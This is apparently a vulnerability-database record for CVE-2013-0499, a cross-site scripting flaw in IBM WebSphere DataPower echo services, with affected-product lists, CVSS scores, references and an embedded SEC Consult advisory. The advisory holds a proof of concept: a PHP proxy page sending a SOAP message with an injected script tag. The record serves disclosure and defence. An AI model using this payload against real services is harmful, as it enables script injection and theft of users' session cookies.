                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:5.0.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:3.8.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:4.0.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:4.0.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:4.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:4.0.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:5.0.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:4.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:4.0.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:3.8.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:ibm:websphere_datapower_integration_appliance_xi52:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:4.0.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:4.0.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:5.0.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:4.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:3.8.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:ibm:websphere_datapower_integration_appliance_xi50:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:4.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:4.0.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:3.8.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:4.0.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:5.0.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:ibm:websphere_datapower_b2b_appliance_xb62:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-0499"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A. Falkenberg",
    "sources": [
      {
        "db": "BID",
        "id": "60027"
      },
      {
        "db": "PACKETSTORM",
        "id": "121738"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201305-593"
      }
    ],
    "trust": 1.0
  },
  "cve": "CVE-2013-0499",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 4.3,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2013-0499",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "VHN-60501",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2013-0499",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201305-593",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-60501",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-60501"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-002845"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-0499"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201305-593"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Cross-site scripting (XSS) vulnerability in the echo functionality on IBM WebSphere DataPower SOA appliances with firmware 3.8.2, 4.0, 4.0.1, 4.0.2, and 5.0.0 allows remote attackers to inject arbitrary web script or HTML via a SOAP message, as demonstrated by the XML Firewall, Multi Protocol Gateway (MPGW), Web Service Proxy, and Web Token services. WebSphere DataPower SOA Appliances are prone to a cross-site scripting vulnerability. \nAn attacker may leverage this issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. IBM WebSphere DataPower SOA Appliances is a set of network equipment of IBM Corporation in the United States. The appliance is primarily used to simplify, secure and accelerate XML and Web services deployment in SOA. SEC Consult Vulnerability Lab Security Advisory \u003c 20130523-0 \u003e\n=======================================================================\n              title: JavaScript Execution in WebSphere DataPower Services\n            product: IBM WebSphere DataPower Integration Appliance XI50\n vulnerable version: 3.8.2, 4.0, 4.0.1, 4.0.2, 5.0.0\n      fixed version: not available, config changes\n         CVE number: CVE-2013-0499\n             impact: Low/Medium\n           homepage: https://www.ibm.com/\n              found: 2013-01-28\n                 by: A. Falkenberg\n                     SEC Consult Vulnerability Lab\n                     https://www.sec-consult.com\n=======================================================================\n\nVendor/product description:\n-----------------------------\nWebSphere\u00ae DataPower\u00ae appliances simplify, govern, and optimize the delivery \nof services and applications and enhance the security of XML and IT services. \nThey extend the capabilities of an infrastructure by providing a multitude of\nfunctions. \nURL: http://www-03.ibm.com/software/products/us/en/datapower/\n\n\nVulnerability overview/description:\n-----------------------------------\nFor the purposes of debugging, DataPower provides configuration options to \necho requests received from the client. For example, XML Firewall service can\nbe configured to echo requests by choosing the backend as \u0027loopback\u0027. Other \nservices like Multi Protocol Gateway and Web Service Proxy can be configured \nto echo requests by setting the variable \u201cvar://service/mpgw/skip-backside\u201d in \nits processing policy. \nIn such configurations, the requests are not sent to a backend server. Without \nadequate validation and processing, the requests may be echoed back to the \nclient. Loopback services that blindly echo requests should only be used for \ndebugging purposes and not intended to be run in production environments as \nthey can result in potential security threats. For example, if an arbitrary \nJavaScript embedded request is sent to such services, they will simply echo it\nback resulting in a potential JavaScript execution vulnerability in the \nclient\u0027s browser. \nURL: https://www-304.ibm.com/support/docview.wss?uid=swg21637717\n\n\nProof of concept:\n-----------------\nThe proof of concept was tested on an IBM Xi50 with the backend configured as \na \"loopback\" Web Service. Any valid SOAP message sent \nto the Web service is returned unmodified to the receiver. If the SOAP \nresponse of the \"loopback\" Web Service is parsed by a browser, any JavaScript\nthat is contained within the XML document will get executed. \nThe following PHP script demonstrates a reflected cross site scripting. \n\n\u003c?php\n$soapEndpoint = \"http://127.0.0.1:80\";\n$soapMessage = \n\u0027\u003c?xml version=\"1.0\"?\u003e\u003csoapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:sam=\"http://sample02.policy.samples.rampart.apache.org\"\u003e\n   \u003csoapenv:Header/\u003e\n   \u003csoapenv:Body\u003e\n      \u003csam:echo\u003e\n        \u003chtml:html xmlns:html=\"http://www.w3.org/1999/xhtml\"\u003e\n            \u003chtml:script\u003ealert(\"XML XSS\");\u003c/html:script\u003e\n        \u003c/html:html\u003e\n      \u003c/sam:echo\u003e\n   \u003c/soapenv:Body\u003e\n\u003c/soapenv:Envelope\u003e\u0027;\n\nif(isset($_POST[\u0027soapMessage\u0027]) and isset($_POST[\u0027soapUrl\u0027])){\n$soap_do = curl_init(); \n\tcurl_setopt($soap_do, CURLOPT_URL,            $_POST[\u0027soapUrl\u0027] );   \n\tcurl_setopt($soap_do, CURLOPT_CONNECTTIMEOUT, 10); \n\tcurl_setopt($soap_do, CURLOPT_TIMEOUT,        10); \n\tcurl_setopt($soap_do, CURLOPT_RETURNTRANSFER, true );\n\tcurl_setopt($soap_do, CURLOPT_SSL_VERIFYPEER, false);  \n\tcurl_setopt($soap_do, CURLOPT_SSL_VERIFYHOST, false); \n\tcurl_setopt($soap_do, CURLOPT_POST,           true ); \n\tcurl_setopt($soap_do, CURLOPT_POSTFIELDS,    $_POST[\u0027soapMessage\u0027]); \n\tcurl_setopt($soap_do, CURLOPT_HTTPHEADER,     array(\u0027Content-Type: text/xml; charset=utf-8\u0027, \u0027Content-Length: \u0027.strlen($_POST[\u0027soapMessage\u0027]) )); \n\n\t$result = curl_exec($soap_do);\n\t$err = curl_error($soap_do);\t\n\n        header(\u0027Content-type: text/xml\u0027);\n\techo $result;\n        exit;\n}\n?\u003e\n\n\u003chtml\u003e\n    \u003cbody\u003e\n        \u003ch1\u003eXSS XML Proxy\u003c/h1\u003e\n        \u003cform name=\"input\" action=\"\" method=\"post\"\u003e\n        SOAP Endpoint: \u003cinput type=\"text\" name=\"soapUrl\" value=\"\u003c?php echo $soapEndpoint; ?\u003e\"\u003e\u003cbr /\u003e\n        SOAP Message:\u0026nbsp; \u003ctextarea cols=\"70\" name=\"soapMessage\" rows=\"14\"\u003e\u003c?php echo $soapMessage; ?\u003e\u003c/textarea\u003e\u003cbr /\u003e\n        \u003cbr /\u003e\n        \u003cinput type=\"submit\" value=\"Submit\"\u003e\n        \u003c/form\u003e \n    \u003c/body\u003e\n\u003c/html\u003e\n\n\n\nVulnerable / tested versions:\n-----------------------------\nSEC Consult verified the vulnerability in the WebSphere DataPower Appliance XI50. \nThe vendor provided an extended list of vulnerable versions: \nWebSphere DataPower 3.8.2, 4.0, 4.0.1, 4.0.2, 5.0.0. \n\n\n\nVendor contact timeline:\n------------------------\n2013-01-30: Sending advisory and proof of concept exploit via encrypted channel. \n2013-01-31: Vendor confirms receipt\n2013-05-17: Vendor posts security bulletin\n2013-05-23: SEC Consult releases coordinated security advisory. \n\n\nSolution:\n---------\nThe vendor does not offer a patch. \n\nThe vulnerability can be prevented by disabling the services to blindly echo\nrequests back. A detailed description can be found on the vendor\u0027s site:\nhttps://www-304.ibm.com/support/docview.wss?uid=swg21637717\n\n\n\nAdvisory URL:\n-------------\nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm\n\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nSEC Consult Unternehmensberatung GmbH\n\nOffice Vienna\nMooslackengasse 17\nA-1190 Vienna\nAustria\n\nTel.: +43 / 1 / 890 30 43 - 0\nFax.: +43 / 1 / 890 30 43 - 25\nMail: research at sec-consult dot com\nWeb: https://www.sec-consult.com\nBlog: http://blog.sec-consult.com\nTwitter: https://twitter.com/sec_consult\n\nEOF A. Falkenberg / @2013\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-0499"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-002845"
      },
      {
        "db": "BID",
        "id": "60027"
      },
      {
        "db": "VULHUB",
        "id": "VHN-60501"
      },
      {
        "db": "PACKETSTORM",
        "id": "121738"
      }
    ],
    "trust": 2.07
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-60501",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-60501"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2013-0499",
        "trust": 2.9
      },
      {
        "db": "BID",
        "id": "60027",
        "trust": 1.0
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-002845",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201305-593",
        "trust": 0.7
      },
      {
        "db": "XF",
        "id": "82221",
        "trust": 0.6
      },
      {
        "db": "BUGTRAQ",
        "id": "20130523 SEC CONSULT SA-20130523-0 :: JAVASCRIPT EXECUTION IN IBM WEBSPHERE DATAPOWER SERVICES",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "121738",
        "trust": 0.2
      },
      {
        "db": "VULHUB",
        "id": "VHN-60501",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-60501"
      },
      {
        "db": "BID",
        "id": "60027"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-002845"
      },
      {
        "db": "PACKETSTORM",
        "id": "121738"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-0499"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201305-593"
      }
    ]
  },
  "id": "VAR-201305-0236",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-60501"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T12:58:08.166000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "1637717",
        "trust": 0.8,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21637717"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-002845"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-79",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-60501"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-002845"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-0499"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130523-0_ibm_xi50_echo-webservice_xss_in_xml_v10.txt"
      },
      {
        "trust": 1.7,
        "url": "http://seclists.org/bugtraq/2013/may/83"
      },
      {
        "trust": 1.7,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21637717"
      },
      {
        "trust": 1.1,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82221"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-0499"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-0499"
      },
      {
        "trust": 0.6,
        "url": "http://xforce.iss.net/xforce/xfdb/82221"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/bid/60027"
      },
      {
        "trust": 0.1,
        "url": "https://twitter.com/sec_consult"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/"
      },
      {
        "trust": 0.1,
        "url": "http://127.0.0.1:80\";"
      },
      {
        "trust": 0.1,
        "url": "http://sample02.policy.samples.rampart.apache.org\"\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0499"
      },
      {
        "trust": 0.1,
        "url": "https://www.sec-consult.com"
      },
      {
        "trust": 0.1,
        "url": "http://schemas.xmlsoap.org/soap/envelope/\""
      },
      {
        "trust": 0.1,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21637717"
      },
      {
        "trust": 0.1,
        "url": "http://www-03.ibm.com/software/products/us/en/datapower/"
      },
      {
        "trust": 0.1,
        "url": "http://www.w3.org/1999/xhtml\"\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://blog.sec-consult.com"
      },
      {
        "trust": 0.1,
        "url": "https://www.sec-consult.com/en/vulnerability-lab/advisories.htm"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-60501"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-002845"
      },
      {
        "db": "PACKETSTORM",
        "id": "121738"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-0499"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201305-593"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-60501"
      },
      {
        "db": "BID",
        "id": "60027"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-002845"
      },
      {
        "db": "PACKETSTORM",
        "id": "121738"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-0499"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201305-593"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2013-05-28T00:00:00",
        "db": "VULHUB",
        "id": "VHN-60501"
      },
      {
        "date": "2013-05-17T00:00:00",
        "db": "BID",
        "id": "60027"
      },
      {
        "date": "2013-05-30T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-002845"
      },
      {
        "date": "2013-05-23T19:51:03",
        "db": "PACKETSTORM",
        "id": "121738"
      },
      {
        "date": "2013-05-28T16:55:01.133000",
        "db": "NVD",
        "id": "CVE-2013-0499"
      },
      {
        "date": "2013-05-28T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201305-593"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-08-29T00:00:00",
        "db": "VULHUB",
        "id": "VHN-60501"
      },
      {
        "date": "2013-05-17T00:00:00",
        "db": "BID",
        "id": "60027"
      },
      {
        "date": "2013-05-30T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-002845"
      },
      {
        "date": "2017-08-29T01:33:03.857000",
        "db": "NVD",
        "id": "CVE-2013-0499"
      },
      {
        "date": "2013-05-29T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201305-593"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201305-593"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "IBM WebSphere DataPower SOA Appliance cross-site scripting vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-002845"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "xss",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "121738"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201305-593"
      }
    ],
    "trust": 0.7
  }
}

FKIE_CVE-2013-0499

Vulnerability from fkie_nvd - Published: 2013-05-28 16:55 - Updated: 2025-04-11 00:51

Severity ?

Summary

References

URL	Tags
psirt@us.ibm.com	http://seclists.org/bugtraq/2013/May/83	Exploit
psirt@us.ibm.com	http://www-01.ibm.com/support/docview.wss?uid=swg21637717	Vendor Advisory
psirt@us.ibm.com	https://exchange.xforce.ibmcloud.com/vulnerabilities/82221
psirt@us.ibm.com	https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130523-0_IBM_Xi50_Echo-WebService_Xss_in_Xml_v10.txt	Exploit
af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/bugtraq/2013/May/83	Exploit
af854a3a-2127-422b-91ae-364da2661108	http://www-01.ibm.com/support/docview.wss?uid=swg21637717	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/82221
af854a3a-2127-422b-91ae-364da2661108	https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130523-0_IBM_Xi50_Echo-WebService_Xss_in_Xml_v10.txt	Exploit

Impacted products

Vendor	Product	Version
ibm	websphere_datapower_xc10_appliance_firmware	3.8.2
ibm	websphere_datapower_xc10_appliance_firmware	4.0
ibm	websphere_datapower_xc10_appliance_firmware	4.0.1
ibm	websphere_datapower_xc10_appliance_firmware	4.0.2
ibm	websphere_datapower_xc10_appliance_firmware	5.0.0
ibm	websphere_datapower_xc10_appliance	-
ibm	websphere_datapower_service_gateway_xg45_virtual_edition_firmware	3.8.2
ibm	websphere_datapower_service_gateway_xg45_virtual_edition_firmware	4.0
ibm	websphere_datapower_service_gateway_xg45_virtual_edition_firmware	4.0.1
ibm	websphere_datapower_service_gateway_xg45_virtual_edition_firmware	4.0.2
ibm	websphere_datapower_service_gateway_xg45_virtual_edition_firmware	5.0.0
ibm	websphere_datapower_service_gateway_xg45_virtual_edition	-
ibm	websphere_datapower_service_gateway_xg45_firmware	3.8.2
ibm	websphere_datapower_service_gateway_xg45_firmware	4.0
ibm	websphere_datapower_service_gateway_xg45_firmware	4.0.1
ibm	websphere_datapower_service_gateway_xg45_firmware	4.0.2
ibm	websphere_datapower_service_gateway_xg45_firmware	5.0.0
ibm	websphere_datapower_service_gateway_xg45	-
ibm	websphere_datapower_integration_appliance_xi52_virtual_edition_firmware	3.8.2
ibm	websphere_datapower_integration_appliance_xi52_virtual_edition_firmware	4.0
ibm	websphere_datapower_integration_appliance_xi52_virtual_edition_firmware	4.0.1
ibm	websphere_datapower_integration_appliance_xi52_virtual_edition_firmware	4.0.2
ibm	websphere_datapower_integration_appliance_xi52_virtual_edition_firmware	5.0.0
ibm	websphere_datapower_integration_appliance_xi52_virtual_edition	-
ibm	websphere_datapower_integration_appliance_xi52_firmware	3.8.2
ibm	websphere_datapower_integration_appliance_xi52_firmware	4.0
ibm	websphere_datapower_integration_appliance_xi52_firmware	4.0.1
ibm	websphere_datapower_integration_appliance_xi52_firmware	4.0.2
ibm	websphere_datapower_integration_appliance_xi52_firmware	5.0.0
ibm	websphere_datapower_integration_appliance_xi52	-
ibm	websphere_datapower_integration_appliance_xi50_firmware	3.8.2
ibm	websphere_datapower_integration_appliance_xi50_firmware	4.0
ibm	websphere_datapower_integration_appliance_xi50_firmware	4.0.1
ibm	websphere_datapower_integration_appliance_xi50_firmware	4.0.2
ibm	websphere_datapower_integration_appliance_xi50_firmware	5.0.0
ibm	websphere_datapower_integration_appliance_xi50	-
ibm	websphere_datapower_b2b_appliance_xb62_firmware	3.8.2
ibm	websphere_datapower_b2b_appliance_xb62_firmware	4.0
ibm	websphere_datapower_b2b_appliance_xb62_firmware	4.0.1
ibm	websphere_datapower_b2b_appliance_xb62_firmware	4.0.2
ibm	websphere_datapower_b2b_appliance_xb62_firmware	5.0.0
ibm	websphere_datapower_b2b_appliance_xb62	-

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
